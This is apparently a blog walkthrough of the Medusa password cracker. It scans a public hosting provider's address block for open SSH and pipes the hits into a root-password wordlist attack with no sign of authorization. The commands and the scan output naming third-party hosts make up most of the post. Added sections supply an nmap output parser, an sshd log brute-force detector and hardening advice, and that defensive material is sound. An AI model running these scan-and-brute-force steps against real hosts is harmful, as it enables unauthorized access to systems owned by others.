From the "accidentally climbing" blog
Medusa is still a relatively fast password cracker. First, let's look at the help.
root@perl-exploit:/pentest/exploits/framework3# medusa
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun/Foofus Networks
ALERT: Host information must be supplied.
Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
  -h [TEXT]   : Target hostname or IP address
  -H [FILE]   : File containing target hostnames or IP addresses
  -u [TEXT]   : Username to test
  -U [FILE]   : File containing usernames to test
  -p [TEXT]   : Password to test
  -P [FILE]   : File containing passwords to test
  -C [FILE]   : File containing combo entries. See README for more information.
  -O [FILE]   : File to append log information to
  -e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
  -M [TEXT]   : Name of the module to execute (without the .mod extension)
  -m [TEXT]   : Parameter to pass to the module. This can be passed multiple times with a
                different parameter each time and they will all be sent to the module (i.e.
                -m Param1 -m Param2, etc.)
  -d          : Dump all known modules
  -n [NUM]    : Use for non-default TCP port number
  -s          : Enable SSL
  -g [NUM]    : Give up after trying to connect for NUM seconds (default 3)
  -r [NUM]    : Sleep NUM seconds between retry attempts (default 3)
  -R [NUM]    : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
  -t [NUM]    : Total number of logins to be tested concurrently
  -T [NUM]    : Total number of hosts to be tested concurrently
  -L          : Parallelize logins using one username per thread. The default is to process
                the entire username before proceeding.
  -f          : Stop scanning host after first valid username/password found.
  -F          : Stop audit after first valid username/password found on any host.
  -b          : Suppress startup banner
  -q          : Display module's usage information
  -v [NUM]    : Verbose level [0-6 (more)]
  -w [NUM]    : Error debug level [0-10 (more)]
  -V          : Display version
  -Z [NUM]    : Resume scan from host #
OK. Now let's see which modules Medusa ships with, i.e. which services it can attack.
root@perl-exploit:/pentest/exploits/framework3# medusa -d
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun/Foofus Networks
Available modules in ".":
Available modules in "/usr/lib/medusa/modules":
  + cvs.mod: Brute force module for CVS sessions: version 1.0.0
  + ftp.mod: Brute force module for FTP/FTPS sessions: version 1.3.0
  + http.mod: Brute force module for HTTP: version 1.3.0
  + imap.mod: Brute force module for IMAP sessions: version 1.2.0
  + mssql.mod: Brute force module for M$-SQL sessions: version 1.1.1
  + mysql.mod: Brute force module for MySQL sessions: version 1.2
  + ncp.mod: Brute force module for NCP sessions: version 1.0.0
  + nntp.mod: Brute force module for NNTP sessions: version 1.0.0
  + pcanywhere.mod: Brute force module for PcAnywhere sessions: version 1.0.2
  + pop3.mod: Brute force module for POP3 sessions: version 1.2
  + postgres.mod: Brute force module for PostgreSQL sessions: version 1.0.0
  + rexec.mod: Brute force module for REXEC sessions: version 1.1.1
  + rlogin.mod: Brute force module for RLOGIN sessions: version 1.0.2
  + rsh.mod: Brute force module for RSH sessions: version 1.0.1
  + smbnt.mod: Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions: version 1.5
  + smtp-vrfy.mod: Brute force module for enumerating accounts via smtp vrfy: version 1.0.0
  + smtp.mod: Brute force module for SMTP Authentication with TLS: version 1.0.0
  + snmp.mod: Brute force module for SNMP Community Strings: version 1.0.0
  + ssh.mod: Brute force module for SSH v2 sessions: version 1.0.2
  + svn.mod: Brute force module for Subversion sessions: version 1.0.0
  + telnet.mod: Brute force module for telnet sessions: version 1.2.2
  + vmauthd.mod: Brute force module for the VMware Authentication Daemon: version 1.0.1
  + vnc.mod: Brute force module for VNC sessions: version 1.0.1
  + web-form.mod: Brute force module for web forms: version 1.0.0
  + wrapper.mod: Generic Wrapper Module: version 1.0.1
We want to crack ssh, so we load the ssh module with -M ssh; the .mod extension is not given on the command line.
First, let's determine the targets: pick a segment and scan it for machines with ssh open.
root@perl-exploit:/pentest# nmap -sV -p22 -oG ssh 69.163.190.0/24
Then there is a long wait. The parameters mean: scan the whole segment for port 22 (-p22), determine the service version (-sV), and save the results in greppable format (-oG) to the file named ssh.
Then we can view the scan results.
root@perl-exploit:/pentest# cat ssh
# Nmap 5.00 scan initiated Tue Jun 22 02:18:28 2010 as: nmap -sV -p22 -oG ssh 69.163.190.0/24
Host: 69.163.190.1 (ip-69-163-190-1.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.2 (ip-69-163-190-2.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.3 (ip-69-163-190-3.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.4 (dragich.shaggy.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.5 (myrck.w.gebob.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.6 (apache2-twang.luthor.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.7 (ps11591.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.8 (ps000054.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.9 (rangerjill.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.10 (ouellette.yogi.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.11 (psmysql11957.dreamhostps.com) Ports: 22/open/tcp//ssh//OpenSSH 4.3p2 Debian 9etch2 (protocol 2.0)/
Host: 69.163.190.12 (rubeo.yogi.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.13 (alt-malware.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Now we need to pull out just the IP addresses that have ssh open. This is where the -oG (greppable) output format pays off.
root@perl-exploit:/pentest# grep "22/open" ssh | cut -d " " -f 2 > ssh1.txt
This command keeps only the lines where port 22 is open and uses cut to take the second space-separated field, the IP address. Let's view the results.
root@perl-exploit:/pentest# cat ssh1.txt
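The grep/cut pipeline works because of the fixed layout of -oG lines, but it breaks as soon as a host line carries several ports or you want the version banner as well. The following is an added example, not code from the post: a small parser for the greppable format that splits each port entry into its seven sub-fields and selects the hosts with 22/tcp open together with their SSH banner (useful, for instance, to inventory which of your own hosts still expose an old OpenSSH). The sample output is constructed and uses RFC 5737 documentation addresses.

```python
import re

# Constructed sample of nmap -oG ("greppable") output; the addresses are RFC 5737
# documentation addresses, not the hosts scanned in the post.
SAMPLE_OG = """\
# Nmap 5.00 scan initiated Tue Jun 22 02:18:28 2010 as: nmap -sV -p22 -oG ssh 192.0.2.0/28
Host: 192.0.2.1 (gw.example.net)\tPorts: 22/closed/tcp//ssh///
Host: 192.0.2.4 (web1.example.net)\tPorts: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 192.0.2.5 (db1.example.net)\tPorts: 22/open/tcp//ssh//OpenSSH 4.3p2 Debian 9etch2 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.2.9/
Host: 192.0.2.9 (fw.example.net)\tPorts: 22/filtered/tcp//ssh///
# Nmap done at Tue Jun 22 02:40:01 2010 -- 16 IP addresses (4 hosts up) scanned in 1293.22 seconds
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")

def parse_greppable(text):
    """Yield (ip, hostname, port, proto, state, service, version) for every port
    entry. In -oG output the tab-separated 'Ports:' field holds comma-separated
    entries, each with seven '/'-separated sub-fields:
        port/state/protocol/owner/service/rpc info/version
    (a version banner containing '/' or ',' would need a smarter split)."""
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue                      # comment lines and hosts without ports
        m = HOST_RE.match(line)
        ip, hostname = m.group(1), m.group(2)
        ports_field = line.split("Ports:", 1)[1].split("\t")[0]
        for entry in ports_field.split(","):
            fields = entry.strip().split("/")
            if len(fields) < 7:
                continue
            port, state, proto, _owner, service, _rpc, version = fields[:7]
            yield (ip, hostname, int(port), proto, state, service, version)

def exposed_ssh(text):
    """Map ip -> version banner for hosts with 22/tcp open: the same selection the
    post's grep/cut pipeline makes, but keyed on the parsed state field, so a
    'closed' or 'filtered' line can never slip through by string coincidence."""
    return {ip: version
            for ip, _h, port, proto, state, _svc, version in parse_greppable(text)
            if port == 22 and proto == "tcp" and state == "open"}
```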
Now let's find a wordlist and start cracking the ssh password.
root@perl-exploit:/pentest# medusa -H ssh1.txt -u root -P p.txt -M ssh
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun/Foofus Networks
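On the receiving end, a run like the one above shows up in sshd's auth log as a tight burst of "Failed password for root" lines from one source, optionally followed by an "Accepted password" line if a wordlist entry hit. The following is an added detection example, not code from the post: it replays constructed sshd log lines (documentation addresses) through a per-source sliding window and flags a source whose failures reach a threshold within the window, escalating the finding if a login from that source is accepted afterwards.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd log lines (syslog format) imitating a wordlist run against root
# like the one in the post; 198.51.100.7 and the others are RFC 5737 addresses.
SAMPLE_AUTH_LOG = "\n".join(
    [f"Jun 22 02:51:{10 + i:02d} web1 sshd[{4000 + i}]: Failed password for root "
     f"from 198.51.100.7 port {52100 + i} ssh2" for i in range(12)]
    + ["Jun 22 02:51:25 web1 sshd[4020]: Accepted password for root from 198.51.100.7 port 52130 ssh2",
       "Jun 22 02:58:01 web1 sshd[4031]: Failed password for invalid user admin from 203.0.113.5 port 40001 ssh2",
       "Jun 22 03:10:00 web1 sshd[4050]: Accepted publickey for deploy from 192.0.2.50 port 50000 ssh2"]
)

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

def detect_bruteforce(log_text, window_s=60, threshold=10, year=2010):
    """Return {src_ip: finding}. A source is 'bruteforce' once `threshold` failed
    logins fall inside `window_s` seconds, and 'compromise' if a login from it is
    accepted after that. `year` is needed because syslog timestamps omit it."""
    recent = defaultdict(deque)      # src -> timestamps of failures still in window
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                 # not an authentication result line
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        src = m["src"]
        if m["result"] == "Failed":
            q = recent[src]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()          # drop failures that aged out of the window
            if len(q) >= threshold:
                findings.setdefault(src, "bruteforce")
        elif src in findings:
            findings[src] = "compromise"   # success right after a detected burst
    return findings
```

Because the run uses -u root, the cheapest mitigations are PermitRootLogin no, key-only authentication and a low MaxAuthTries in sshd_config. Medusa's -T option spreads attempts across many hosts at once, so this per-host detector should feed a central log store where the same source can be correlated across the whole segment.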